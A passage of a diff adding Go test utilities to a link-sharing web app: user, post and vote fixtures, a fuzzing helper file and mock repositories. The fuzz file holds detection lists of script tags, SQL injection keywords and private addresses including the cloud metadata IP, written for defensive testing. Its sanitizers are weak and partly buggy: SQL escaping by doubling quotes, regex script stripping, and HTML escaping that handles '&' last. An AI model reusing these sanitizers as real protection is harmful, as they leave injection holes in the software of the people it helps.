AllowedOrigins: []string{"http://localhost:3000"},
EnableRateLimit: true,
EnableCompression: true,
},
Logging: LoggingConfig{
Level: "debug",
Format: "json",
Output: "stdout",
},
},
}
}
func CreateSecureTestUser(t *testing.T, db *gorm.DB, username, email string) *database.User {
t.Helper()
if username == "" {
username = generateSecureRandomString(8)
}
if email == "" {
email = fmt.Sprintf("%s@test.local", username)
}
password := generateSecurePassword()
hashedPassword, err := bcrypt.GenerateFromPassword([]byte(password), bcrypt.DefaultCost)
if err != nil {
t.Fatalf("Failed to hash password: %v", err)
}
user := &database.User{
Username: username,
Email: email,
Password: string(hashedPassword),
EmailVerified: true,
}
if err := db.Create(user).Error; err != nil {
t.Fatalf("Failed to create test user: %v", err)
}
return user
}
func CreateSecureTestPost(t *testing.T, db *gorm.DB, authorID uint) *database.Post {
t.Helper()
title := generateSecureRandomString(12)
url := fmt.Sprintf("https://example.com/%s", generateSecureRandomString(8))
content := fmt.Sprintf("Test content for %s", title)
post := &database.Post{
Title: title,
URL: url,
Content: content,
AuthorID: &authorID,
UpVotes: 0,
DownVotes: 0,
Score: 0,
}
if err := db.Create(post).Error; err != nil {
t.Fatalf("Failed to create test post: %v", err)
}
return post
}
func CreateSecureTestVote(t *testing.T, db *gorm.DB, userID, postID uint, voteType database.VoteType) *database.Vote {
t.Helper()
vote := &database.Vote{
UserID: &userID,
PostID: postID,
Type: voteType,
}
if err := db.Create(vote).Error; err != nil {
t.Fatalf("Failed to create test vote: %v", err)
}
return vote
}
func (f *TestFixtures) CreateTestUsers(t *testing.T, db *gorm.DB) []*database.User {
t.Helper()
var users []*database.User
for _, userData := range f.Users {
user := *userData
hashedPassword, err := bcrypt.GenerateFromPassword([]byte(user.Password), bcrypt.DefaultCost)
if err != nil {
t.Fatalf("Failed to hash password: %v", err)
}
user.Password = string(hashedPassword)
if err := db.Create(&user).Error; err != nil {
t.Fatalf("Failed to create test user: %v", err)
}
users = append(users, &user)
}
return users
}
func (f *TestFixtures) CreateTestPosts(t *testing.T, db *gorm.DB, authorID uint) []*database.Post {
t.Helper()
var posts []*database.Post
for _, postData := range f.Posts {
post := *postData
post.AuthorID = &authorID
if err := db.Create(&post).Error; err != nil {
t.Fatalf("Failed to create test post: %v", err)
}
posts = append(posts, &post)
}
return posts
}
func (f *TestFixtures) CreateTestVotes(t *testing.T, db *gorm.DB, userID, postID uint) []*database.Vote {
t.Helper()
var votes []*database.Vote
for _, voteData := range f.Votes {
vote := *voteData
vote.UserID = &userID
vote.PostID = postID
if err := db.Create(&vote).Error; err != nil {
t.Fatalf("Failed to create test vote: %v", err)
}
votes = append(votes, &vote)
}
return votes
}
func generateSecureRandomString(length int) string {
const charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
result := make([]byte, length)
for i := range result {
num, _ := rand.Int(rand.Reader, big.NewInt(int64(len(charset))))
result[i] = charset[num.Int64()]
}
return string(result)
}
func generateSecurePassword() string {
letters := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
numbers := "0123456789"
special := "!@#$%^&*"
password := ""
num, _ := rand.Int(rand.Reader, big.NewInt(int64(len(letters))))
password += string(letters[num.Int64()])
num, _ = rand.Int(rand.Reader, big.NewInt(int64(len(numbers))))
password += string(numbers[num.Int64()])
num, _ = rand.Int(rand.Reader, big.NewInt(int64(len(special))))
password += string(special[num.Int64()])
for len(password) < 12 {
charset := letters + numbers + special
num, _ := rand.Int(rand.Reader, big.NewInt(int64(len(charset))))
password += string(charset[num.Int64()])
}
return password
}
func CleanupTestData(t *testing.T, db *gorm.DB) {
t.Helper()
if err := db.Exec("DELETE FROM votes").Error; err != nil {
t.Logf("Warning: Failed to clean up votes: %v", err)
}
if err := db.Exec("DELETE FROM posts").Error; err != nil {
t.Logf("Warning: Failed to clean up posts: %v", err)
}
if err := db.Exec("DELETE FROM account_deletion_requests").Error; err != nil {
t.Logf("Warning: Failed to clean up account deletion requests: %v", err)
}
if err := db.Exec("DELETE FROM users").Error; err != nil {
t.Logf("Warning: Failed to clean up users: %v", err)
}
}
func AssertUserExists(t *testing.T, db *gorm.DB, userID uint) {
t.Helper()
var count int64
if err := db.Model(&database.User{}).Where("id = ?", userID).Count(&count).Error; err != nil {
t.Fatalf("Failed to check user existence: %v", err)
}
if count == 0 {
t.Errorf("Expected user with ID %d to exist", userID)
}
}
func AssertUserNotExists(t *testing.T, db *gorm.DB, userID uint) {
t.Helper()
var count int64
if err := db.Model(&database.User{}).Where("id = ?", userID).Count(&count).Error; err != nil {
t.Fatalf("Failed to check user existence: %v", err)
}
if count > 0 {
t.Errorf("Expected user with ID %d to not exist", userID)
}
}
func AssertPostExists(t *testing.T, db *gorm.DB, postID uint) {
t.Helper()
var count int64
if err := db.Model(&database.Post{}).Where("id = ?", postID).Count(&count).Error; err != nil {
t.Fatalf("Failed to check post existence: %v", err)
}
if count == 0 {
t.Errorf("Expected post with ID %d to exist", postID)
}
}
func AssertVoteExists(t *testing.T, db *gorm.DB, userID, postID uint) {
t.Helper()
var count int64
if err := db.Model(&database.Vote{}).Where("user_id = ? AND post_id = ?", userID, postID).Count(&count).Error; err != nil {
t.Fatalf("Failed to check vote existence: %v", err)
}
if count == 0 {
t.Errorf("Expected vote for user %d and post %d to exist", userID, postID)
}
}
func GetUserCount(t *testing.T, db *gorm.DB) int64 {
t.Helper()
var count int64
if err := db.Model(&database.User{}).Count(&count).Error; err != nil {
t.Fatalf("Failed to get user count: %v", err)
}
return count
}
func GetPostCount(t *testing.T, db *gorm.DB) int64 {
t.Helper()
var count int64
if err := db.Model(&database.Post{}).Count(&count).Error; err != nil {
t.Fatalf("Failed to get post count: %v", err)
}
return count
}
func GetVoteCount(t *testing.T, db *gorm.DB) int64 {
t.Helper()
var count int64
if err := db.Model(&database.Vote{}).Count(&count).Error; err != nil {
t.Fatalf("Failed to get vote count: %v", err)
}
return count
}

381
internal/testutils/fuzz.go Normal file
View File

@@ -0,0 +1,381 @@
package testutils
import (
"bytes"
"encoding/json"
"net/http"
"net/http/httptest"
"regexp"
"strings"
"unicode/utf8"
)
type FuzzInputValidator struct {
MaxInputLength int
MinInputLength int
}
func NewFuzzInputValidator() *FuzzInputValidator {
return &FuzzInputValidator{
MaxInputLength: 10000,
MinInputLength: 0,
}
}
func (f *FuzzInputValidator) ValidateFuzzInput(data []byte) bool {
if !utf8.Valid(data) {
return false
}
if len(data) < f.MinInputLength || len(data) > f.MaxInputLength {
return false
}
return true
}
func (f *FuzzInputValidator) ValidateFuzzInputStrict(data []byte) bool {
if !f.ValidateFuzzInput(data) {
return false
}
input := string(data)
if len(strings.TrimSpace(input)) == 0 {
return false
}
return true
}
func ValidateUTF8String(s string) {
if !utf8.ValidString(s) {
panic("String contains invalid UTF-8")
}
}
func ValidateNoNullBytes(s string) {
if strings.Contains(s, "\x00") {
panic("String contains null bytes")
}
}
func ValidateNoScriptTags(s string) {
if strings.Contains(strings.ToLower(s), "<script") {
panic("String contains script tags")
}
}
func ValidateNoJavascriptProtocol(s string) {
if strings.Contains(strings.ToLower(s), "javascript:") {
panic("String contains javascript: protocol")
}
}
func ValidateNoDangerousChars(s string) {
dangerousChars := []string{"<", ">", "\"", "'", "&", "|", ";", "`", "$", "(", ")", "{", "}", "[", "]", "\\", "/", "*", "?", "!", "@", "#", "%", "^", "~"}
for _, char := range dangerousChars {
if strings.Contains(s, char) {
panic("String contains dangerous character: " + char)
}
}
}
func ValidateNoDangerousHTMLTags(s string) {
dangerousTags := []string{
"<script", "</script>", "<iframe", "</iframe>", "<object", "</object>",
"<embed", "</embed>", "<form", "</form>", "<input", "<button",
"<link", "<meta", "<style", "</style>",
}
for _, tag := range dangerousTags {
if strings.Contains(strings.ToLower(s), tag) {
panic("String contains dangerous HTML tag: " + tag)
}
}
}
func ValidateNoPrivateIPs(s string) {
privateIPs := []string{
"localhost", "127.0.0.1", "0.0.0.0", "10.", "172.", "192.168.", "169.254.169.254",
}
for _, ip := range privateIPs {
if strings.Contains(strings.ToLower(s), ip) {
panic("String contains private IP: " + ip)
}
}
}
func ValidateNoSQLInjectionPatterns(s string) {
sqlPatterns := []string{
"';", "--", "/*", "*/", "xp_", "sp_", "exec", "execute",
"union", "select", "insert", "update", "delete", "drop",
"create", "alter", "grant", "revoke", "truncate",
}
lowerS := strings.ToLower(s)
for _, pattern := range sqlPatterns {
if strings.Contains(lowerS, pattern) {
panic("String contains SQL injection pattern: " + pattern)
}
}
}
func ValidateNoExcessiveRepetition(s string, maxRepeats int) {
if hasRepeatedCharacters(s, maxRepeats) {
panic("String contains excessive character repetition")
}
words := strings.Fields(s)
wordCount := make(map[string]int)
for _, word := range words {
wordCount[strings.ToLower(word)]++
if wordCount[strings.ToLower(word)] > 3 {
panic("String contains excessive word repetition")
}
}
}
func hasRepeatedCharacters(str string, maxRepeats int) bool {
if len(str) <= maxRepeats {
return false
}
currentChar := rune(0)
count := 0
for _, char := range str {
if char == currentChar {
count++
if count > maxRepeats {
return true
}
} else {
currentChar = char
count = 1
}
}
return false
}
type FuzzJSONParser struct{}
func NewFuzzJSONParser() *FuzzJSONParser {
return &FuzzJSONParser{}
}
func (p *FuzzJSONParser) ParseJSON(data []byte) bool {
var result map[string]any
err := json.Unmarshal(data, &result)
return err == nil
}
func (p *FuzzJSONParser) ParseJSONWithValidation(data []byte) {
var result map[string]any
err := json.Unmarshal(data, &result)
if err != nil {
return
}
for key, value := range result {
ValidateUTF8String(key)
if str, ok := value.(string); ok {
ValidateUTF8String(str)
}
}
}
type FuzzHTTPRequest struct{}
func NewFuzzHTTPRequest() *FuzzHTTPRequest {
return &FuzzHTTPRequest{}
}
func (r *FuzzHTTPRequest) CreateTestRequest(method, url string, body []byte, headers map[string]string) *http.Request {
var reqBody bytes.Buffer
if body != nil {
reqBody.Write(body)
}
req := httptest.NewRequest(method, url, &reqBody)
for name, value := range headers {
req.Header.Set(name, value)
}
return req
}
func (r *FuzzHTTPRequest) ValidateHTTPRequest(req *http.Request) {
pathParts := strings.Split(req.URL.Path, "/")
for _, part := range pathParts {
ValidateUTF8String(part)
}
for name, values := range req.URL.Query() {
ValidateUTF8String(name)
for _, value := range values {
ValidateUTF8String(value)
}
}
for name, values := range req.Header {
ValidateUTF8String(name)
for _, value := range values {
ValidateUTF8String(value)
}
}
}
type FuzzSanitizer struct{}
func NewFuzzSanitizer() *FuzzSanitizer {
return &FuzzSanitizer{}
}
func (s *FuzzSanitizer) SanitizeHTML(input string) string {
scriptRegex := regexp.MustCompile(`(?i)<script[^>]*>.*?</script>`)
result := scriptRegex.ReplaceAllString(input, "")
jsRegex := regexp.MustCompile(`(?i)javascript:`)
result = jsRegex.ReplaceAllString(result, "")
eventRegex := regexp.MustCompile(`(?i)\son\w+\s*=\s*"[^"]*"`)
result = eventRegex.ReplaceAllString(result, "")
return result
}
func (s *FuzzSanitizer) SanitizeSQL(input string) string {
result := strings.ReplaceAll(input, "'", "''")
result = strings.ReplaceAll(result, ";", "")
return result
}
func (s *FuzzSanitizer) SanitizeXSS(input string) string {
result := strings.ReplaceAll(input, "<", "&lt;")
result = strings.ReplaceAll(result, ">", "&gt;")
result = strings.ReplaceAll(result, "\"", "&quot;")
result = strings.ReplaceAll(result, "'", "&#x27;")
result = strings.ReplaceAll(result, "&", "&amp;")
return result
}
func (s *FuzzSanitizer) SanitizeControlChars(input string) string {
result := strings.ReplaceAll(input, "\x00", "")
result = strings.ReplaceAll(result, "\r", "")
result = strings.ReplaceAll(result, "\n", "")
result = strings.ReplaceAll(result, "\t", "")
return strings.TrimSpace(result)
}
func (s *FuzzSanitizer) ValidateSanitizedInput(input string) {
ValidateUTF8String(input)
ValidateNoNullBytes(input)
ValidateNoScriptTags(input)
ValidateNoJavascriptProtocol(input)
}
type FuzzValidationPipeline struct{}
func NewFuzzValidationPipeline() *FuzzValidationPipeline {
return &FuzzValidationPipeline{}
}
func (p *FuzzValidationPipeline) ProcessInput(input string) string {
result := strings.TrimSpace(input)
if len(result) > 1000 {
result = result[:1000]
}
result = strings.ReplaceAll(result, "\x00", "")
result = strings.ReplaceAll(result, "\r", "")
result = strings.ReplaceAll(result, "\n", "")
return result
}
func (p *FuzzValidationPipeline) ValidateProcessedInput(input string) {
ValidateUTF8String(input)
ValidateNoNullBytes(input)
ValidateNoExcessiveRepetition(input, 5)
}
type FuzzTestRunner struct{}
func NewFuzzTestRunner() *FuzzTestRunner {
return &FuzzTestRunner{}
}
func (r *FuzzTestRunner) RunFuzzTest(data []byte, testFunc func(string)) int {
validator := NewFuzzInputValidator()
if !validator.ValidateFuzzInput(data) {
return -1
}
input := string(data)
testFunc(input)
return 0
}
func (r *FuzzTestRunner) RunFuzzTestStrict(data []byte, testFunc func(string)) int {
validator := NewFuzzInputValidator()
if !validator.ValidateFuzzInputStrict(data) {
return -1
}
input := string(data)
testFunc(input)
return 0
}
type CommonFuzzTestCases struct{}
func NewCommonFuzzTestCases() *CommonFuzzTestCases {
return &CommonFuzzTestCases{}
}
func (c *CommonFuzzTestCases) GetAuthTestCases(fuzzedData string) []map[string]any {
return []map[string]any{
{
"name": "auth_login",
"body": `{"username":"` + fuzzedData + `","password":"test123"}`,
},
{
"name": "auth_register",
"body": `{"username":"` + fuzzedData + `","email":"test@example.com","password":"test123"}`,
},
}
}
func (c *CommonFuzzTestCases) GetPostTestCases(fuzzedData string) []map[string]any {
return []map[string]any{
{
"name": "post_create",
"body": `{"title":"` + fuzzedData + `","url":"https://example.com","content":"test"}`,
},
{
"name": "post_search",
"url": "/api/posts/search?q=" + fuzzedData,
},
}
}
func (c *CommonFuzzTestCases) GetVoteTestCases(fuzzedData string) []map[string]any {
return []map[string]any{
{
"name": "vote_cast",
"body": `{"type":"` + fuzzedData + `"}`,
},
}
}

998
internal/testutils/mocks.go Normal file
View File

@@ -0,0 +1,998 @@
package testutils
import (
"context"
"fmt"
"net/url"
"strings"
"sync"
"time"
"goyco/internal/database"
"goyco/internal/repositories"
"gorm.io/gorm"
)
type MockEmailSender struct {
sendFunc func(to, subject, body string) error
lastVerificationToken string
lastDeletionToken string
lastPasswordResetToken string
mu sync.Mutex
}
func (m *MockEmailSender) Send(to, subject, body string) error {
if m.sendFunc != nil {
return m.sendFunc(to, subject, body)
}
if len(body) == 0 {
return nil
}
normalized := strings.ToLower(strings.TrimSpace(subject))
token := extractTokenFromBody(body)
switch {
case strings.Contains(normalized, "resend") && strings.Contains(normalized, "confirm"):
m.SetVerificationToken(defaultIfEmpty(token, "test-verification-token"))
case strings.Contains(normalized, "confirm your goyco account") || strings.Contains(normalized, "confirm your account"):
m.SetVerificationToken(defaultIfEmpty(token, "test-verification-token"))
case strings.Contains(normalized, "confirm") && strings.Contains(normalized, "email"):
m.SetVerificationToken(defaultIfEmpty(token, "test-verification-token"))
case strings.Contains(normalized, "confirm your new email"):
m.SetVerificationToken(defaultIfEmpty(token, "test-verification-token"))
case strings.Contains(normalized, "account deletion"):
m.SetDeletionToken(defaultIfEmpty(token, "test-deletion-token"))
case strings.Contains(normalized, "password reset") || strings.Contains(normalized, "reset your") || strings.Contains(normalized, "reset password"):
m.SetPasswordResetToken(defaultIfEmpty(token, "test-password-reset-token"))
}
return nil
}
func (m *MockEmailSender) GetLastVerificationToken() string {
m.mu.Lock()
defer m.mu.Unlock()
return m.lastVerificationToken
}
func (m *MockEmailSender) GetLastDeletionToken() string {
m.mu.Lock()
defer m.mu.Unlock()
return m.lastDeletionToken
}
func (m *MockEmailSender) GetLastPasswordResetToken() string {
m.mu.Lock()
defer m.mu.Unlock()
return m.lastPasswordResetToken
}
func (m *MockEmailSender) Reset() {
m.mu.Lock()
defer m.mu.Unlock()
m.lastVerificationToken = ""
m.lastDeletionToken = ""
m.lastPasswordResetToken = ""
}
func (m *MockEmailSender) VerificationToken() string {
m.mu.Lock()
defer m.mu.Unlock()
return m.lastVerificationToken
}
func (m *MockEmailSender) SetVerificationToken(token string) {
m.mu.Lock()
defer m.mu.Unlock()
m.lastVerificationToken = token
}
func (m *MockEmailSender) DeletionToken() string {
m.mu.Lock()
defer m.mu.Unlock()
return m.lastDeletionToken
}
func (m *MockEmailSender) PasswordResetToken() string {
m.mu.Lock()
defer m.mu.Unlock()
return m.lastPasswordResetToken
}
func (m *MockEmailSender) SetDeletionToken(token string) {
m.mu.Lock()
defer m.mu.Unlock()
m.lastDeletionToken = token
}
func (m *MockEmailSender) SetPasswordResetToken(token string) {
m.mu.Lock()
defer m.mu.Unlock()
m.lastPasswordResetToken = token
}
func defaultIfEmpty(value, fallback string) string {
if strings.TrimSpace(value) == "" {
return fallback
}
return value
}
func extractTokenFromBody(body string) string {
index := strings.Index(body, "token=")
if index == -1 {
return ""
}
tokenPart := body[index+len("token="):]
if delimIdx := strings.IndexAny(tokenPart, "&\"'\\\r\n <>"); delimIdx != -1 {
tokenPart = tokenPart[:delimIdx]
}
trimmed := strings.Trim(tokenPart, "\"' ")
if trimmed == "" {
return ""
}
unescaped, err := url.QueryUnescape(trimmed)
if err != nil {
return trimmed
}
return unescaped
}
type MockTitleFetcher struct {
fetchFunc func(ctx context.Context, url string) (string, error)
title string
err error
}
func (m *MockTitleFetcher) FetchTitle(ctx context.Context, url string) (string, error) {
if m.fetchFunc != nil {
return m.fetchFunc(ctx, url)
}
if m.err != nil {
return "", m.err
}
return m.title, nil
}
func (m *MockTitleFetcher) SetTitle(title string) {
m.title = title
m.err = nil
}
func (m *MockTitleFetcher) SetError(err error) {
m.err = err
m.title = ""
}
type MockUserRepository struct {
users map[uint]*database.User
usersByUsername map[string]*database.User
usersByEmail map[string]*database.User
usersByVerificationToken map[string]*database.User
usersByPasswordResetToken map[string]*database.User
deletedUsers map[uint]*database.User
nextID uint
createErr error
getByIDErr error
getByUsernameErr error
getByEmailErr error
getByVerificationTokenErr error
getByPasswordResetTokenErr error
updateErr error
deleteErr error
mu sync.RWMutex
GetAllFunc func(limit, offset int) ([]database.User, error)
GetDeletedUsersFunc func() ([]database.User, error)
HardDeleteAllFunc func() (int64, error)
GetErr error
DeleteErr error
Users map[uint]*database.User
DeletedUsers map[uint]*database.User
}
func NewMockUserRepository() *MockUserRepository {
return &MockUserRepository{
users: make(map[uint]*database.User),
usersByUsername: make(map[string]*database.User),
usersByEmail: make(map[string]*database.User),
usersByVerificationToken: make(map[string]*database.User),
usersByPasswordResetToken: make(map[string]*database.User),
deletedUsers: make(map[uint]*database.User),
nextID: 1,
Users: make(map[uint]*database.User),
DeletedUsers: make(map[uint]*database.User),
}
}
func (m *MockUserRepository) Create(user *database.User) error {
m.mu.Lock()
defer m.mu.Unlock()
if m.createErr != nil {
return m.createErr
}
user.ID = m.nextID
m.nextID++
now := time.Now()
user.CreatedAt = now
user.UpdatedAt = now
userCopy := *user
m.users[user.ID] = &userCopy
m.usersByUsername[user.Username] = &userCopy
m.usersByEmail[user.Email] = &userCopy
m.Users[user.ID] = &userCopy
if user.EmailVerificationToken != "" {
m.usersByVerificationToken[user.EmailVerificationToken] = &userCopy
}
if user.PasswordResetToken != "" {
m.usersByPasswordResetToken[user.PasswordResetToken] = &userCopy
}
return nil
}
func (m *MockUserRepository) GetByID(id uint) (*database.User, error) {
if m.GetErr != nil {
return nil, m.GetErr
}
m.mu.RLock()
defer m.mu.RUnlock()
if m.getByIDErr != nil {
return nil, m.getByIDErr
}
if user, ok := m.users[id]; ok {
userCopy := *user
return &userCopy, nil
}
return nil, gorm.ErrRecordNotFound
}
func (m *MockUserRepository) GetByUsername(username string) (*database.User, error) {
m.mu.RLock()
defer m.mu.RUnlock()
if m.getByUsernameErr != nil {
return nil, m.getByUsernameErr
}
if user, ok := m.usersByUsername[username]; ok {
userCopy := *user
return &userCopy, nil
}
return nil, gorm.ErrRecordNotFound
}
func (m *MockUserRepository) GetByUsernameIncludingDeleted(username string) (*database.User, error) {
return m.GetByUsername(username)
}
func (m *MockUserRepository) GetByIDIncludingDeleted(id uint) (*database.User, error) {
return m.GetByID(id)
}
func (m *MockUserRepository) GetByEmail(email string) (*database.User, error) {
m.mu.RLock()
defer m.mu.RUnlock()
if m.getByEmailErr != nil {
return nil, m.getByEmailErr
}
if user, ok := m.usersByEmail[email]; ok {
userCopy := *user
return &userCopy, nil
}
return nil, gorm.ErrRecordNotFound
}
func (m *MockUserRepository) GetByVerificationToken(token string) (*database.User, error) {
m.mu.RLock()
defer m.mu.RUnlock()
if m.getByVerificationTokenErr != nil {
return nil, m.getByVerificationTokenErr
}
if user, ok := m.usersByVerificationToken[token]; ok {
userCopy := *user
return &userCopy, nil
}
return nil, gorm.ErrRecordNotFound
}
func (m *MockUserRepository) GetByPasswordResetToken(token string) (*database.User, error) {
m.mu.RLock()
defer m.mu.RUnlock()
if m.getByPasswordResetTokenErr != nil {
return nil, m.getByPasswordResetTokenErr
}
if user, ok := m.usersByPasswordResetToken[token]; ok {
userCopy := *user
return &userCopy, nil
}
return nil, gorm.ErrRecordNotFound
}
func (m *MockUserRepository) GetAll(limit, offset int) ([]database.User, error) {
if m.GetErr != nil {
return nil, m.GetErr
}
if m.GetAllFunc != nil {
return m.GetAllFunc(limit, offset)
}
m.mu.RLock()
defer m.mu.RUnlock()
var users []database.User
count := 0
for _, user := range m.users {
if count >= offset && count < offset+limit {
users = append(users, *user)
}
count++
}
return users, nil
}
func (m *MockUserRepository) Update(user *database.User) error {
m.mu.Lock()
defer m.mu.Unlock()
if m.updateErr != nil {
return m.updateErr
}
if _, ok := m.users[user.ID]; !ok {
return gorm.ErrRecordNotFound
}
user.UpdatedAt = time.Now()
userCopy := *user
m.users[user.ID] = &userCopy
m.usersByUsername[user.Username] = &userCopy
m.usersByEmail[user.Email] = &userCopy
return nil
}
func (m *MockUserRepository) Delete(id uint) error {
m.mu.Lock()
defer m.mu.Unlock()
if m.DeleteErr != nil {
return m.DeleteErr
}
if user, ok := m.users[id]; ok {
delete(m.users, id)
delete(m.usersByUsername, user.Username)
delete(m.usersByEmail, user.Email)
return nil
}
return gorm.ErrRecordNotFound
}
func (m *MockUserRepository) HardDelete(id uint) error {
return m.Delete(id)
}
func (m *MockUserRepository) SoftDeleteWithPosts(id uint) error {
return m.Delete(id)
}
func (m *MockUserRepository) GetPosts(userID uint, limit, offset int) ([]database.Post, error) {
return []database.Post{}, nil
}
func (m *MockUserRepository) Lock(id uint) error {
return nil
}
func (m *MockUserRepository) Unlock(id uint) error {
return nil
}
func (m *MockUserRepository) GetDeletedUsers() ([]database.User, error) {
if m.GetDeletedUsersFunc != nil {
return m.GetDeletedUsersFunc()
}
return []database.User{}, nil
}
func (m *MockUserRepository) HardDeleteAll() (int64, error) {
if m.HardDeleteAllFunc != nil {
return m.HardDeleteAllFunc()
}
m.mu.Lock()
defer m.mu.Unlock()
count := int64(len(m.users))
m.users = make(map[uint]*database.User)
m.usersByUsername = make(map[string]*database.User)
m.usersByEmail = make(map[string]*database.User)
m.usersByVerificationToken = make(map[string]*database.User)
m.usersByPasswordResetToken = make(map[string]*database.User)
return count, nil
}
func (m *MockUserRepository) Count() (int64, error) {
m.mu.RLock()
defer m.mu.RUnlock()
return int64(len(m.users)), nil
}
func (m *MockUserRepository) WithTx(tx *gorm.DB) repositories.UserRepository {
return m
}
func (m *MockUserRepository) SetCreateError(err error) {
m.mu.Lock()
defer m.mu.Unlock()
m.createErr = err
}
func (m *MockUserRepository) SetGetByIDError(err error) {
m.mu.Lock()
defer m.mu.Unlock()
m.getByIDErr = err
}
func (m *MockUserRepository) SetGetByUsernameError(err error) {
m.mu.Lock()
defer m.mu.Unlock()
m.getByUsernameErr = err
}
func (m *MockUserRepository) SetGetByEmailError(err error) {
m.mu.Lock()
defer m.mu.Unlock()
m.getByEmailErr = err
}
func (m *MockUserRepository) SetUpdateError(err error) {
m.mu.Lock()
defer m.mu.Unlock()
m.updateErr = err
}
func (m *MockUserRepository) SetDeleteError(err error) {
m.mu.Lock()
defer m.mu.Unlock()
m.deleteErr = err
}
type MockPostRepository struct {
createFunc func(*database.Post) error
getByIDFunc func(uint) (*database.Post, error)
getAllFunc func(int, int) ([]database.Post, error)
getByUserIDFunc func(uint, int, int) ([]database.Post, error)
updateFunc func(*database.Post) error
deleteFunc func(uint) error
countFunc func() (int64, error)
countByUserIDFunc func(uint) (int64, error)
getTopPostsFunc func(int) ([]database.Post, error)
getNewestPostsFunc func(int) ([]database.Post, error)
searchFunc func(string, int, int) ([]database.Post, error)
getPostsByDeletedUsersFunc func() ([]database.Post, error)
hardDeletePostsByDeletedUsersFunc func() (int64, error)
hardDeleteAllFunc func() (int64, error)
withTxFunc func(*gorm.DB) repositories.PostRepository
GetPostsByDeletedUsersFunc func() ([]database.Post, error)
HardDeletePostsByDeletedUsersFunc func() (int64, error)
HardDeleteAllFunc func() (int64, error)
CountFunc func() (int64, error)
posts map[uint]*database.Post
nextID uint
mu sync.RWMutex
SearchCalls []SearchCall
GetErr error
DeleteErr error
SearchErr error
Posts map[uint]*database.Post
}
type SearchCall struct {
Query string
Limit int
Offset int
}
func NewMockPostRepository() *MockPostRepository {
return &MockPostRepository{
posts: make(map[uint]*database.Post),
nextID: 1,
Posts: make(map[uint]*database.Post),
}
}
func (m *MockPostRepository) Create(post *database.Post) error {
if m.createFunc != nil {
return m.createFunc(post)
}
m.mu.Lock()
defer m.mu.Unlock()
post.ID = m.nextID
m.nextID++
postCopy := *post
m.posts[post.ID] = &postCopy
m.Posts[post.ID] = &postCopy
return nil
}
func (m *MockPostRepository) GetByID(id uint) (*database.Post, error) {
if m.GetErr != nil {
return nil, m.GetErr
}
if m.getByIDFunc != nil {
return m.getByIDFunc(id)
}
m.mu.RLock()
defer m.mu.RUnlock()
if post, ok := m.posts[id]; ok {
postCopy := *post
return &postCopy, nil
}
return nil, gorm.ErrRecordNotFound
}
func (m *MockPostRepository) GetAll(limit, offset int) ([]database.Post, error) {
if m.GetErr != nil {
return nil, m.GetErr
}
if m.getAllFunc != nil {
return m.getAllFunc(limit, offset)
}
m.mu.RLock()
defer m.mu.RUnlock()
var posts []database.Post
count := 0
for _, post := range m.posts {
if count >= offset && count < offset+limit {
posts = append(posts, *post)
}
count++
}
return posts, nil
}
func (m *MockPostRepository) GetByUserID(userID uint, limit, offset int) ([]database.Post, error) {
if m.GetErr != nil {
return nil, m.GetErr
}
if m.getByUserIDFunc != nil {
return m.getByUserIDFunc(userID, limit, offset)
}
m.mu.RLock()
defer m.mu.RUnlock()
var posts []database.Post
count := 0
for _, post := range m.posts {
if post.AuthorID != nil && *post.AuthorID == userID {
if count >= offset && count < offset+limit {
posts = append(posts, *post)
}
count++
}
}
return posts, nil
}
func (m *MockPostRepository) Update(post *database.Post) error {
if m.updateFunc != nil {
return m.updateFunc(post)
}
m.mu.Lock()
defer m.mu.Unlock()
if _, ok := m.posts[post.ID]; !ok {
return gorm.ErrRecordNotFound
}
postCopy := *post
m.posts[post.ID] = &postCopy
m.Posts[post.ID] = &postCopy
return nil
}
func (m *MockPostRepository) Delete(id uint) error {
if m.DeleteErr != nil {
return m.DeleteErr
}
if m.deleteFunc != nil {
return m.deleteFunc(id)
}
m.mu.Lock()
defer m.mu.Unlock()
if _, ok := m.posts[id]; !ok {
return gorm.ErrRecordNotFound
}
delete(m.posts, id)
return nil
}
func (m *MockPostRepository) Count() (int64, error) {
if m.CountFunc != nil {
return m.CountFunc()
}
if m.countFunc != nil {
return m.countFunc()
}
m.mu.RLock()
defer m.mu.RUnlock()
return int64(len(m.posts)), nil
}
func (m *MockPostRepository) CountByUserID(userID uint) (int64, error) {
if m.countByUserIDFunc != nil {
return m.countByUserIDFunc(userID)
}
m.mu.RLock()
defer m.mu.RUnlock()
count := int64(0)
for _, post := range m.posts {
if post.AuthorID != nil && *post.AuthorID == userID {
count++
}
}
return count, nil
}
func (m *MockPostRepository) GetTopPosts(limit int) ([]database.Post, error) {
if m.getTopPostsFunc != nil {
return m.getTopPostsFunc(limit)
}
return m.GetAll(limit, 0)
}
func (m *MockPostRepository) GetNewestPosts(limit int) ([]database.Post, error) {
if m.getNewestPostsFunc != nil {
return m.getNewestPostsFunc(limit)
}
return m.GetAll(limit, 0)
}
func (m *MockPostRepository) Search(query string, limit, offset int) ([]database.Post, error) {
if m.SearchErr != nil {
return nil, m.SearchErr
}
m.mu.Lock()
m.SearchCalls = append(m.SearchCalls, SearchCall{
Query: query,
Limit: limit,
Offset: offset,
})
m.mu.Unlock()
if m.searchFunc != nil {
return m.searchFunc(query, limit, offset)
}
m.mu.RLock()
defer m.mu.RUnlock()
var posts []database.Post
count := 0
for _, post := range m.posts {
if containsIgnoreCase(post.Title, query) || containsIgnoreCase(post.Content, query) {
if count >= offset && count < offset+limit {
posts = append(posts, *post)
}
count++
}
}
return posts, nil
}
func (m *MockPostRepository) WithTx(tx *gorm.DB) repositories.PostRepository {
if m.withTxFunc != nil {
return m.withTxFunc(tx)
}
return m
}
func (m *MockPostRepository) GetPostsByDeletedUsers() ([]database.Post, error) {
if m.GetPostsByDeletedUsersFunc != nil {
return m.GetPostsByDeletedUsersFunc()
}
if m.getPostsByDeletedUsersFunc != nil {
return m.getPostsByDeletedUsersFunc()
}
return []database.Post{}, nil
}
func (m *MockPostRepository) HardDeletePostsByDeletedUsers() (int64, error) {
if m.HardDeletePostsByDeletedUsersFunc != nil {
return m.HardDeletePostsByDeletedUsersFunc()
}
if m.hardDeletePostsByDeletedUsersFunc != nil {
return m.hardDeletePostsByDeletedUsersFunc()
}
return 0, nil
}
func (m *MockPostRepository) HardDeleteAll() (int64, error) {
if m.HardDeleteAllFunc != nil {
return m.HardDeleteAllFunc()
}
if m.hardDeleteAllFunc != nil {
return m.hardDeleteAllFunc()
}
m.mu.Lock()
defer m.mu.Unlock()
